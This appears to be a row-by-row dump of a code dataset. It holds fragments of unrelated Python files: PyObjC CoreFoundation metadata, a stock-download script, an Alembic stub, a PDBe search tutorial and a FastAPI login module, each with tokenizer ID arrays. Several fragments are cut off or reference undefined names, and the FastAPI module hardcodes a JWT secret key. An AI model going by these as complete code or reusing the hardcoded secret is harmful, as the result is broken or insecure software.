"CFCharacterSetCreateWithBitmapRepresentation": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleGetValueForInfoDictionaryKey": (b"@^{__CFBundle=}^{__CFString=}",),
"CFXMLParserGetCallBacks": (
sel32or64(
b"v^{__CFXMLParser=}^{_CFXMLParserCallBacks=l^?^?^?^?^?}",
b"v^{__CFXMLParser=}^{_CFXMLParserCallBacks=q^?^?^?^?^?}",
),
),
"CFWriteStreamUnscheduleFromRunLoop": (
b"v^{__CFWriteStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFAttributedStringCreateCopy": (
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFAttributedString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorSetBitAtIndex": (
sel32or64(b"v^{__CFBitVector=}lL", b"v^{__CFBitVector=}qI"),
),
"CFReadStreamSetDispatchQueue": (
sel32or64(b"v^{__CFReadStream=}^{dispatch_queue_s=}", b"v^{__CFReadStream=}@"),
),
"CFMessagePortSetDispatchQueue": (
sel32or64(
b"v^{__CFMessagePort=}^{dispatch_queue_s=}", b"v^{__CFMessagePort=}@"
),
),
"CFStringGetNameOfEncoding": (sel32or64(b"^{__CFString=}L", b"^{__CFString=}I"),),
"CFBitVectorSetAllBits": (
sel32or64(b"v^{__CFBitVector=}L", b"v^{__CFBitVector=}I"),
),
"CFSocketGetContext": (
sel32or64(
b"v^{__CFSocket=}^{_CFSocketContext=l^v^?^?^?}",
b"v^{__CFSocket=}^{_CFSocketContext=q^v^?^?^?}",
),
),
"CFLocaleGetWindowsLocaleCodeFromLocaleIdentifier": (b"I^{__CFString=}",),
"CFXMLParserGetLineNumber": (
sel32or64(b"l^{__CFXMLParser=}", b"q^{__CFXMLParser=}"),
),
"CFTimeZoneGetDaylightSavingTimeOffset": (b"d^{__CFTimeZone=}d",),
"CFPreferencesAddSuitePreferencesToApp": (b"v^{__CFString=}^{__CFString=}",),
"CFURLGetFileSystemRepresentation": (
sel32or64(b"Z^{__CFURL=}Z^tl", b"Z^{__CFURL=}Z^tq"),
"",
{
"arguments": {
2: {
"c_array_delimited_by_null": True,
"type_modifier": "o",
"c_array_length_in_arg": 3,
}
}
},
),
"CFSetApplyFunction": (
b"v^{__CFSet=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFStringCapitalize": (b"v^{__CFString=}^{__CFLocale=}",),
"CFBinaryHeapGetMinimumIfPresent": (
b"Z^{__CFBinaryHeap=}^@",
"",
{"arguments": {1: {"type_modifier": "o"}}},
),
"CFURLCopyPathExtension": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCopyISOCountryCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCreateCopy": (
b"^{__CFLocale=}^{__CFAllocator=}^{__CFLocale=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFURLEnumeratorSkipDescendents": (b"v^{__CFURLEnumerator=}",),
"CFBinaryHeapAddValue": (b"v^{__CFBinaryHeap=}@",),
"CFBinaryHeapGetValues": (b"v^{__CFBinaryHeap=}^^v",),
"CFDateFormatterGetAbsoluteTimeFromString": (
sel32or64(
b"Z^{__CFDateFormatter=}^{__CFString=}^{_CFRange=ll}^d",
b"Z^{__CFDateFormatter=}^{__CFString=}^{_CFRange=qq}^d",
),
"",
{"arguments": {2: {"type_modifier": "N"}, 3: {"type_modifier": "o"}}},
),
"CFTreeSortChildren": (
b"v^{__CFTree=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"l"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFURLCopyResourcePropertiesForKeys": (
b"^{__CFDictionary=}^{__CFURL=}^{__CFArray=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFNumberCompare": (
sel32or64(
b"l^{__CFNumber=}^{__CFNumber=}^v", b"q^{__CFNumber=}^{__CFNumber=}^v"
),
),
"CFURLHasDirectoryPath": (b"Z^{__CFURL=}",),
"CFSwapInt16HostToBig": (b"SS",),
"CFXMLCreateStringByEscapingEntities": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}^{__CFDictionary=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesSetMultiple": (
b"v^{__CFDictionary=}^{__CFArray=}^{__CFString=}^{__CFString=}^{__CFString=}",
),
"CFBagGetValue": (b"@^{__CFBag=}@",),
"CFBundleGetBundleWithIdentifier": (b"^{__CFBundle=}^{__CFString=}",),
"CFMakeCollectable": (b"@@",),
"CFSetGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringAppendFormat": (
b"v^{__CFString=}^{__CFDictionary=}^{__CFString=}",
"",
{"arguments": {2: {"printf_format": True}}, "variadic": True},
),
"CFNumberGetValue": (sel32or64(b"Z^{__CFNumber=}l^v", b"Z^{__CFNumber=}q^v"),),
"CFStringTokenizerSetString": (
sel32or64(
b"v^{__CFStringTokenizer=}^{__CFString=}{_CFRange=ll}",
b"v^{__CFStringTokenizer=}^{__CFString=}{_CFRange=qq}",
),
),
"CFRunLoopGetMain": (b"^{__CFRunLoop=}",),
"CFDictionaryRemoveAllValues": (b"v^{__CFDictionary=}",),
"CFPropertyListCreateDeepCopy": (
sel32or64(b"@^{__CFAllocator=}@L", b"@^{__CFAllocator=}@Q"),
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDGetTypeID": (sel32or64(b"L", b"Q"),),
"CFNotificationCenterPostNotificationWithOptions": (
sel32or64(
b"v^{__CFNotificationCenter=}^{__CFString=}@^{__CFDictionary=}L",
b"v^{__CFNotificationCenter=}^{__CFString=}@^{__CFDictionary=}Q",
),
),
"CFStringLowercase": (b"v^{__CFString=}^{__CFLocale=}",),
"CFCalendarSetMinimumDaysInFirstWeek": (
sel32or64(b"v^{__CFCalendar=}l", b"v^{__CFCalendar=}q"),
),
"CFRetain": (b"@@",),
"CFStringGetCharacters": (
sel32or64(b"v^{__CFString=}{_CFRange=ll}^T", b"v^{__CFString=}{_CFRange=qq}^T"),
"",
{"arguments": {2: {"c_array_length_in_arg": 1, "type_modifier": "o"}}},
),
"CFTimeZoneGetName": (b"^{__CFString=}^{__CFTimeZone=}",),
"CFURLCopyStrictPath": (
b"^{__CFString=}^{__CFURL=}^Z",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}},
},
),
"CFBundleIsExecutableLoaded": (b"Z^{__CFBundle=}",),
"CFArrayAppendArray": (
sel32or64(
b"v^{__CFArray=}^{__CFArray=}{_CFRange=ll}",
b"v^{__CFArray=}^{__CFArray=}{_CFRange=qq}",
),
),
"CFNumberFormatterGetTypeID": (sel32or64(b"L", b"Q"),),
"CFDateGetTypeID": (sel32or64(b"L", b"Q"),),
"CFPreferencesCopyMultiple": (
b"^{__CFDictionary=}^{__CFArray=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBinaryHeapGetTypeID": (sel32or64(b"L", b"Q"),),
"CFTimeZoneCopyLocalizedName": (
sel32or64(
b"^{__CFString=}^{__CFTimeZone=}l^{__CFLocale=}",
b"^{__CFString=}^{__CFTimeZone=}q^{__CFLocale=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarCopyLocale": (
b"^{__CFLocale=}^{__CFCalendar=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFFileDescriptorDisableCallBacks": (
sel32or64(b"v^{__CFFileDescriptor=}L", b"v^{__CFFileDescriptor=}Q"),
),
"CFBundleLoadExecutableAndReturnError": (
b"Z^{__CFBundle=}^^{__CFError=}",
"",
{
"arguments": {
1: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFNumberFormatterCreateNumberFromString": (
sel32or64(
b"^{__CFNumber=}^{__CFAllocator=}^{__CFNumberFormatter=}^{__CFString=}^{_CFRange=ll}L",
b"^{__CFNumber=}^{__CFAllocator=}^{__CFNumberFormatter=}^{__CFString=}^{_CFRange=qq}Q",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "N"}},
},
),
"CFAttributedStringGetAttribute": (
sel32or64(
b"@^{__CFAttributedString=}l^{__CFString=}^{_CFRange=ll}",
b"@^{__CFAttributedString=}q^{__CFString=}^{_CFRange=qq}",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFURLCopyLastPathComponent": (
b"^{__CFString=}^{__CFURL=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleCopyResourcesDirectoryURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopGetCurrent": (b"^{__CFRunLoop=}",),
"CFDateFormatterCreateDateFromString": (
sel32or64(
b"^{__CFDate=}^{__CFAllocator=}^{__CFDateFormatter=}^{__CFString=}^{_CFRange=ll}",
b"^{__CFDate=}^{__CFAllocator=}^{__CFDateFormatter=}^{__CFString=}^{_CFRange=qq}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {3: {"type_modifier": "N"}},
},
),
"CFURLEnumeratorGetDescendentLevel": (
sel32or64(b"l^{__CFURLEnumerator=}", b"q^{__CFURLEnumerator=}"),
),
"CFStringGetSurrogatePairForLongCharacter": (
sel32or64(b"ZL^T", b"ZI^T"),
"",
{"arguments": {1: {"c_array_of_fixed_length": 2, "type_modifier": "o"}}},
),
"CFBagApplyFunction": (
b"v^{__CFBag=}^?@",
"",
{
"arguments": {
1: {
"callable": {
"retval": {"type": b"v"},
"arguments": {0: {"type": b"@"}, 1: {"type": b"@"}},
},
"callable_retained": False,
}
}
},
),
"CFBundleCopySharedSupportURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetCreateWithCharactersInString": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFPreferencesCopyKeyList": (
b"^{__CFArray=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFDateFormatterGetTypeID": (sel32or64(b"L", b"Q"),),
"CFRunLoopSourceGetContext": (
sel32or64(
b"v^{__CFRunLoopSource=}^{_CFRunLoopSourceContext=l^v^?^?^?^?^?^?^?^?}",
b"v^{__CFRunLoopSource=}^{_CFRunLoopSourceContext=q^v^?^?^?^?^?^?^?^?}",
),
),
"CFBundleGetAllBundles": (b"^{__CFArray=}",),
"CFFileSecuritySetGroupUUID": (b"Z^{__CFFileSecurity=}^{__CFUUID=}",),
"CFCharacterSetCreateMutableCopy": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetRangeOfComposedCharactersAtIndex": (
sel32or64(b"{_CFRange=ll}^{__CFString=}l", b"{_CFRange=qq}^{__CFString=}q"),
),
"CFAttributedStringBeginEditing": (b"v^{__CFAttributedString=}",),
"CFNumberFormatterGetFormat": (b"^{__CFString=}^{__CFNumberFormatter=}",),
"CFErrorGetTypeID": (sel32or64(b"L", b"Q"),),
"CFURLCopyParameterString": (
b"^{__CFString=}^{__CFURL=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetAttributesAndLongestEffectiveRange": (
sel32or64(
b"^{__CFDictionary=}^{__CFAttributedString=}l{_CFRange=ll}^{_CFRange=ll}",
b"^{__CFDictionary=}^{__CFAttributedString=}q{_CFRange=qq}^{_CFRange=qq}",
),
"",
{"arguments": {3: {"type_modifier": "o"}}},
),
"CFXMLParserGetContext": (
sel32or64(
b"v^{__CFXMLParser=}^{_CFXMLParserContext=l^v^?^?^?}",
b"v^{__CFXMLParser=}^{_CFXMLParserContext=q^v^?^?^?}",
),
),
"CFCopyDescription": (
b"^{__CFString=}@",
"",
{"retval": {"already_cfretained": True}},
),
"CFDataDeleteBytes": (
sel32or64(b"v^{__CFData=}{_CFRange=ll}", b"v^{__CFData=}{_CFRange=qq}"),
),
"CFWriteStreamGetError": (
sel32or64(
b"{_CFStreamError=ll}^{__CFWriteStream=}",
b"{_CFStreamError=qi}^{__CFWriteStream=}",
),
),
"CFURLCreateResourcePropertiesForKeysFromBookmarkData": (
b"^{__CFDictionary=}^{__CFAllocator=}^{__CFArray=}^{__CFData=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorGetFirstIndexOfBit": (
sel32or64(
b"l^{__CFBitVector=}{_CFRange=ll}L", b"q^{__CFBitVector=}{_CFRange=qq}I"
),
),
"CFCharacterSetCreateCopy": (
b"^{__CFCharacterSet=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringCreateMutableWithExternalCharactersNoCopy": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^Tll^{__CFAllocator=}",
b"^{__CFString=}^{__CFAllocator=}^Tqq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFRunLoopCopyCurrentMode": (
b"^{__CFString=}^{__CFRunLoop=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBundleGetPackageInfo": (
sel32or64(b"v^{__CFBundle=}^L^L", b"v^{__CFBundle=}^I^I"),
"",
{"arguments": {1: {"type_modifier": "o"}, 2: {"type_modifier": "o"}}},
),
"CFCalendarSetFirstWeekday": (
sel32or64(b"v^{__CFCalendar=}l", b"v^{__CFCalendar=}q"),
),
"CFStringGetFastestEncoding": (sel32or64(b"L^{__CFString=}", b"I^{__CFString=}"),),
"CFSocketIsValid": (b"Z^{__CFSocket=}",),
"CFTreeGetChildren": (
b"v^{__CFTree=}^^{__CFTree=}",
"",
{"arguments": {1: {"c_array_of_variable_length": True, "type_modifier": "o"}}},
),
"CFBundleGetLocalInfoDictionary": (b"^{__CFDictionary=}^{__CFBundle=}",),
"CFArrayBSearchValues": (
sel32or64(
b"l^{__CFArray=}{_CFRange=ll}@^?@", b"q^{__CFArray=}{_CFRange=qq}@^?@"
),
"",
{
"arguments": {
3: {
"callable": {
"retval": {"type": b"l"},
"arguments": {
0: {"type": b"@"},
1: {"type": b"@"},
2: {"type": b"@"},
},
},
"callable_retained": False,
}
}
},
),
"CFTreeGetNextSibling": (b"^{__CFTree=}^{__CFTree=}",),
"CFMessagePortGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBagGetCount": (sel32or64(b"l^{__CFBag=}", b"q^{__CFBag=}"),),
"CFBagRemoveAllValues": (b"v^{__CFBag=}",),
"CFCharacterSetCreateBitmapRepresentation": (
b"^{__CFData=}^{__CFAllocator=}^{__CFCharacterSet=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLParserGetDocument": (b"^v^{__CFXMLParser=}",),
"CFXMLNodeGetTypeCode": (sel32or64(b"l^{__CFXMLNode=}", b"q^{__CFXMLNode=}"),),
"CFArrayGetValues": (
sel32or64(b"v^{__CFArray=}{_CFRange=ll}^@", b"v^{__CFArray=}{_CFRange=qq}^@"),
"",
{"arguments": {2: {"c_array_length_in_arg": 1, "type_modifier": "o"}}},
),
"CFCharacterSetIsSupersetOfSet": (b"Z^{__CFCharacterSet=}^{__CFCharacterSet=}",),
"CFRunLoopObserverGetTypeID": (sel32or64(b"L", b"Q"),),
"CFAbsoluteTimeGetGregorianDate": (
sel32or64(
b"{_CFGregorianDate=lccccd}d^{__CFTimeZone=}",
b"{_CFGregorianDate=iccccd}d^{__CFTimeZone=}",
),
),
"CFNotificationCenterRemoveObserver": (
b"v^{__CFNotificationCenter=}@^{__CFString=}@",
),
"CFCalendarSetTimeZone": (b"v^{__CFCalendar=}^{__CFTimeZone=}",),
"CFSetCreateMutableCopy": (
sel32or64(
b"^{__CFSet=}^{__CFAllocator=}l^{__CFSet=}",
b"^{__CFSet=}^{__CFAllocator=}q^{__CFSet=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLTreeCreateWithNode": (
b"^{__CFTree=}^{__CFAllocator=}^{__CFXMLNode=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFRunLoopTimerGetOrder": (
sel32or64(b"l^{__CFRunLoopTimer=}", b"q^{__CFRunLoopTimer=}"),
),
"CFTreeCreate": (
sel32or64(
b"^{__CFTree=}^{__CFAllocator=}^{_CFTreeContext=l^v^?^?^?}",
b"^{__CFTree=}^{__CFAllocator=}^{_CFTreeContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFPreferencesCopyAppValue": (
b"@^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFXMLNodeGetString": (b"^{__CFString=}^{__CFXMLNode=}",),
"CFSocketCreateWithSocketSignature": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=lll^{__CFData=}}L^?^{_CFSocketContext=l^v^?^?^?}",
b"^{__CFSocket=}^{__CFAllocator=}^{_CFSocketSignature=iii^{__CFData=}}Q^?^{_CFSocketContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFURLEnumeratorCreateForDirectoryURL": (
sel32or64(
b"^{__CFURLEnumerator=}^{__CFAllocator=}^{__CFURL=}L^{__CFArray=}",
b"^{__CFURLEnumerator=}^{__CFAllocator=}^{__CFURL=}Q^{__CFArray=}",
),
"",
{"retval": {"already_cfretained": True}},
),
}
aliases = {
"CFDateFormatterKey": "CFStringRef",
"CFNumberFormatterKey": "CFStringRef",
"CF_TYPED_EXTENSIBLE_ENUM": "_CF_TYPED_EXTENSIBLE_ENUM",
"CF_EXTENSIBLE_STRING_ENUM": "_CF_TYPED_EXTENSIBLE_ENUM",
"CF_STRING_ENUM": "_CF_TYPED_ENUM",
"CFErrorDomain": "CFStringRef",
"CF_TYPED_ENUM": "_CF_TYPED_ENUM",
"CFRunLoopMode": "CFStringRef",
"kCFBookmarkResolutionWithoutMountingMask": "kCFURLBookmarkResolutionWithoutMountingMask",
"kCFBookmarkResolutionWithoutUIMask": "kCFURLBookmarkResolutionWithoutUIMask",
"CFCalendarIdentifier": "CFStringRef",
"kCFFileSecurityRemoveACL": "_FILESEC_REMOVE_ACL",
"CFXMLTreeRef": "CFTreeRef",
"CFStreamPropertyKey": "CFStringRef",
"CFLocaleKey": "CFStringRef",
"CFNotificationName": "CFStringRef",
"CFLocaleIdentifier": "CFStringRef",
}
cftypes = [
("CFAllocatorRef", b"^{__CFAllocator=}", "CFAllocatorGetTypeID", None),
("CFArrayRef", b"^{__CFArray=}", "CFArrayGetTypeID", "NSArray"),
(
"CFAttributedStringRef",
b"^{__CFAttributedString=}",
"CFAttributedStringGetTypeID",
"__NSCFAttributedString,NSCFAttributedString",
),
("CFBagRef", b"^{__CFBag=}", "CFBagGetTypeID", None),
("CFBinaryHeapRef", b"^{__CFBinaryHeap=}", "CFBinaryHeapGetTypeID", None),
("CFBitVectorRef", b"^{__CFBitVector=}", "CFBitVectorGetTypeID", None),
(
"CFBooleanRef",
b"^{__CFBoolean=}",
"CFBooleanGetTypeID",
"__NSCFBoolean,NSCFBoolean",
),
("CFBundleRef", b"^{__CFBundle=}", "CFBundleGetTypeID", None),
(
"CFCalendarRef",
b"^{__CFCalendar=}",
"CFCalendarGetTypeID",
"__NSCFCalendar,NSCFCalendar",
),
(
"CFCharacterSetRef",
b"^{__CFCharacterSet=}",
"CFCharacterSetGetTypeID",
"__NSCFCharacterSet,NSCFCharacterSet",
),
("CFDataRef", b"^{__CFData=}", "CFDataGetTypeID", "__NSCFData,NSCFData"),
("CFDateFormatterRef", b"^{__CFDateFormatter=}", "CFDateFormatterGetTypeID", None),
("CFDateRef", b"^{__CFDate=}", "CFDateGetTypeID", "__NSCFDate,NSCFDate,__NSDate"),
("CFDictionaryRef", b"^{__CFDictionary=}", "CFDictionaryGetTypeID", "NSDictionary"),
("CFErrorRef", b"^{__CFError=}", "CFErrorGetTypeID", "__NSCFError,NSCFError"),
(
"CFFileDescriptorRef",
b"^{__CFFileDescriptor=}",
"CFFileDescriptorGetTypeID",
None,
),
(
"CFFileSecurityRef",
b"^{__CFFileSecurity=}",
"CFFileSecurityGetTypeID",
"__NSFileSecurity",
),
("CFLocaleRef", b"^{__CFLocale=}", "CFLocaleGetTypeID", "__NSCFLocale,NSCFLocale"),
("CFMachPortRef", b"^{__CFMachPort=}", "CFMachPortGetTypeID", "NSMachPort"),
("CFMessagePortRef", b"^{__CFMessagePort=}", "CFMessagePortGetTypeID", None),
("CFMutableArrayRef", b"^{__CFArray=}", "CFArrayGetTypeID", "NSMutableArray"),
(
"CFMutableAttributedStringRef",
b"^{__CFAttributedString=}",
"CFAttributedStringGetTypeID",
"__NSCFAttributedString,NSCFAttributedString",
),
("CFMutableBagRef", b"^{__CFBag=}", "CFBagGetTypeID", None),
("CFMutableBitVectorRef", b"^{__CFBitVector=}", "CFBitVectorGetTypeID", None),
(
"CFMutableCharacterSetRef",
b"^{__CFCharacterSet=}",
"CFCharacterSetGetTypeID",
None,
),
("CFMutableDataRef", b"^{__CFData=}", "CFDataGetTypeID", "NSMutableData"),
(
"CFMutableDictionaryRef",
b"^{__CFDictionary=}",
"CFDictionaryGetTypeID",
"NSMutableDictionary",
),
("CFMutableSetRef", b"^{__CFSet=}", "CFSetGetTypeID", "NSMutableSet"),
("CFMutableStringRef", b"^{__CFString=}", "CFStringGetTypeID", None),
(
"CFNotificationCenterRef",
b"^{__CFNotificationCenter=}",
"CFNotificationCenterGetTypeID",
None,
),
("CFNullRef", b"^{__CFNull=}", "CFNullGetTypeID", "NSNull"),
(
"CFNumberFormatterRef",
b"^{__CFNumberFormatter=}",
"CFNumberFormatterGetTypeID",
None,
),
("CFNumberRef", b"^{__CFNumber=}", "CFNumberGetTypeID", "__NSCFNumber,NSCFNumber"),
(
"CFPlugInInstanceRef",
b"^{__CFPlugInInstance=}",
"CFPlugInInstanceGetTypeID",
None,
),
(
"CFReadStreamRef",
b"^{__CFReadStream=}",
"CFReadStreamGetTypeID",
"__NSCFInputStream,NSCFInputStream",
),
(
"CFRunLoopObserverRef",
b"^{__CFRunLoopObserver=}",
"CFRunLoopObserverGetTypeID",
None,
),
("CFRunLoopRef", b"^{__CFRunLoop=}", "CFRunLoopGetTypeID", None),
("CFRunLoopSourceRef", b"^{__CFRunLoopSource=}", "CFRunLoopSourceGetTypeID", None),
(
"CFRunLoopTimerRef",
b"^{__CFRunLoopTimer=}",
"CFRunLoopTimerGetTypeID",
"__NSCFTimer,NSCFTimer",
),
("CFSetRef", b"^{__CFSet=}", "CFSetGetTypeID", "NSSet"),
("CFSocketRef", b"^{__CFSocket=}", "CFSocketGetTypeID", None),
("CFStringRef", b"^{__CFString=}", "CFStringGetTypeID", "NSString"),
(
"CFStringTokenizerRef",
b"^{__CFStringTokenizer=}",
"CFStringTokenizerGetTypeID",
None,
),
("CFTimeZoneRef", b"^{__CFTimeZone=}", "CFTimeZoneGetTypeID", "NSTimeZone"),
("CFTreeRef", b"^{__CFTree=}", "CFTreeGetTypeID", None),
("CFURLEnumeratorRef", b"^{__CFURLEnumerator=}", "CFURLEnumeratorGetTypeID", None),
("CFURLRef", b"^{__CFURL=}", "CFURLGetTypeID", "NSURL"),
("CFUUIDRef", b"^{__CFUUID=}", "CFUUIDGetTypeID", None),
(
"CFUserNotificationRef",
b"^{__CFUserNotification=}",
"CFUserNotificationGetTypeID",
None,
),
(
"CFWriteStreamRef",
b"^{__CFWriteStream=}",
"CFWriteStreamGetTypeID",
"__NSCFOutputStream,NSCFOutputStream",
),
("CFXMLNodeRef", b"^{__CFXMLNode=}", "CFXMLNodeGetTypeID", None),
("CFXMLParserRef", b"^{__CFXMLParser=}", "CFXMLParserGetTypeID", None),
]
expressions = {
"kCFISO8601DateFormatWithFullTime": "kCFISO8601DateFormatWithTime | kCFISO8601DateFormatWithColonSeparatorInTime | kCFISO8601DateFormatWithTimeZone | kCFISO8601DateFormatWithColonSeparatorInTimeZone",
"kCFISO8601DateFormatWithFullDate": "kCFISO8601DateFormatWithYear | kCFISO8601DateFormatWithMonth | kCFISO8601DateFormatWithDay | kCFISO8601DateFormatWithDashSeparatorInDate",
"kCFISO8601DateFormatWithInternetDateTime": "kCFISO8601DateFormatWithFullDate | kCFISO8601DateFormatWithFullTime",
}
# END OF FILE
| [
2,
770,
2393,
318,
7560,
416,
9432,
13,
38993,
198,
2,
198,
2,
4586,
4296,
25,
2892,
1526,
1467,
8487,
25,
4309,
25,
1314,
12131,
198,
2,
198,
2,
781,
539,
23,
25,
645,
20402,
198,
198,
11748,
26181,
66,
11,
25064,
198,
198,
361... | 1.897908 | 94,366 |
import argparse
import xml.etree.ElementTree as ET
import requests
import numpy
from progress.bar import Bar
bar = Bar('Sending', max=4000)
try :
dictdata = numpy.load("stockDictionary.npy",allow_pickle=True)
except :
if args.downloadStock or args.syncDictionary :
pass
else:
print("Try using python3 graffati.py -ds to download the stock file with dictionary ")
exit();
with open('./outputdata.txt','w') as f :
f.write("Products \n")
if __name__ == "__main__":
main()
#https://www.no1brand.ru/pr/N1B-11ED9FB
| [
11748,
1822,
29572,
220,
198,
11748,
35555,
13,
316,
631,
13,
20180,
27660,
355,
12152,
198,
11748,
7007,
198,
11748,
299,
32152,
220,
198,
6738,
4371,
13,
5657,
1330,
2409,
198,
198,
5657,
796,
2409,
10786,
50,
1571,
3256,
3509,
28,
... | 2.502183 | 229 |
import json
import docker
from django.conf import settings
| [
11748,
33918,
198,
11748,
36253,
198,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
628,
198
] | 3.875 | 16 |
"""empty message
Revision ID: 3acf60608a7d
Revises: 48a5caa0a762
Create Date: 2015-03-26 11:26:40.461247
"""
# revision identifiers, used by Alembic.
revision = '3acf60608a7d'
down_revision = '48a5caa0a762'
from alembic import op
import sqlalchemy as sa
| [
37811,
28920,
3275,
198,
198,
18009,
1166,
4522,
25,
513,
330,
69,
1899,
28688,
64,
22,
67,
198,
18009,
2696,
25,
4764,
64,
20,
6888,
64,
15,
64,
48194,
198,
16447,
7536,
25,
1853,
12,
3070,
12,
2075,
1367,
25,
2075,
25,
1821,
13,... | 2.385321 | 109 |
#!/usr/bin/env python3
# Copyright 2018 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
"""
PDBe API Training
This interactive Python notebook will guide you through various ways of programmatically accessing Protein Data Bank in Europe (PDBe) data using REST API
The REST API is a programmatic way to obtain information from the PDB and EMDB. You can access details about:
sample
experiment
models
compounds
cross-references
publications
quality
assemblies
and more...
For more information, visit http://www.ebi.ac.uk/pdbe/pdbe-rest-api
"""
# DEPENDENCIES:
# requests
"""
1) Making imports and setting variables
First, we import some packages that we will use, and set some variables.
Note: Full list of valid URLs is available from http://www.ebi.ac.uk/pdbe/api/doc/
"""
import requests
search_url = "https://www.ebi.ac.uk/pdbe/search/pdb/select?q="
search_variables = "&wt=json&rows=10"
"""
## 2) Defining request function
Let's start with defining a function that can be used to get a URL response. We will use this function to
retrieving the search results in JSON format.
"""
"""
3) Defining search function
We need a function that will construct the search string in the adequate query format, and which will then get the
data in JSON format using the url_response() function implemented earlier.
"""
"""
4) Trying out the search
Finally, we can try out our function using a custom search term. Note that the space between words has to be
types as "%20", for example "Homo%20sapiens".
The result will be a JSON with all PDB entries the search could find.
We print out the PDB ids using a simple for loop at the bottom.
"""
search_terms = 'molecule_name:"Dihydrofolate%20reductase" AND organism_scientific_name:"Homo%20sapiens"'
results = run_search(search_terms)
pdb_list = []
for result in results:
pdb = result["pdb_id"]
if pdb not in pdb_list:
pdb_list.append(pdb)
print(pdb_list)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
2,
15069,
2864,
17228,
9148,
532,
3427,
16024,
259,
18982,
873,
5136,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
19... | 3.445531 | 716 |
from datetime import datetime, timedelta
from fastapi import HTTPException
from typing import Optional
from fastapi.security import OAuth2PasswordBearer
from fastapi import Depends
from jose import JWTError, jwt
from sqlalchemy.orm import Session
from database import get_db
from repository.user import User as ModelUser
import schemas
SECRET_KEY = "09d25e094faa6ca2556c818166b7a9563b93f7099f6f0f4caa6cf63b88e8d3e7"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="login")
| [
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
6738,
3049,
15042,
1330,
14626,
16922,
198,
6738,
19720,
1330,
